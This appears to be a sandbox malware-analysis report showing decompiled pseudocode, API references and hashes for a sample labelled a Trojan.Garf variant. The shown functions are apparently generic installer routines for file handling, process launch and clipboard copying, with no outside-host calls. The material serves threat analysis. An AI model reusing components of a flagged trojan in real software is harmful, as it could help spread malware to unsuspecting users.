                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3712363035-0
                                                                                              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                              • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                              • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                              0x00406a3d
                                                                                              0x00406a40
                                                                                              0x00406a47
                                                                                              0x00406a4f
                                                                                              0x00406a5b
                                                                                              0x00000000
                                                                                              0x00406a62
                                                                                              0x00406a52
                                                                                              0x00406a59
                                                                                              0x00000000
                                                                                              0x00406a6a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                              0x0040615c
                                                                                              0x00406169
                                                                                              0x0040617e
                                                                                              0x00406184

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,80000000,00000003), ref: 0040615C
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                                              0x00406138
                                                                                              0x0040613e
                                                                                              0x00406143
                                                                                              0x0040614c
                                                                                              0x0040614c
                                                                                              0x00406155

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                              0x00405c1c
                                                                                              0x00405c24
                                                                                              0x00000000
                                                                                              0x00405c2a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                              • GetLastError.KERNEL32 ref: 00405C2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x0040620e
                                                                                              0x0040621e
                                                                                              0x00406226
                                                                                              0x00000000
                                                                                              0x0040622d
                                                                                              0x00000000
                                                                                              0x0040622f

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040F550,0040CEF0,00403579,0040CEF0,0040F550,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x004061df
                                                                                              0x004061ef
                                                                                              0x004061f7
                                                                                              0x00000000
                                                                                              0x004061fe
                                                                                              0x00000000
                                                                                              0x00406200

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                              0x00403606
                                                                                              0x0040360c

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                              0x00401faa
                                                                                              0x00401faf
                                                                                              0x00401fb5
                                                                                              0x00401fba
                                                                                              0x00401fbe
                                                                                              0x0040292e
                                                                                              0x00401fc4
                                                                                              0x00401fc7
                                                                                              0x00401fca
                                                                                              0x00401fd2
                                                                                              0x00401fe1
                                                                                              0x00401fe3
                                                                                              0x00401fe3
                                                                                              0x00401fd4
                                                                                              0x00401fd8
                                                                                              0x00401fd8
                                                                                              0x00401fd2
                                                                                              0x00401fea
                                                                                              0x00401feb
                                                                                              0x00401feb
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                                • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2972824698-0
                                                                                              • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                              • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                              • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                              • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
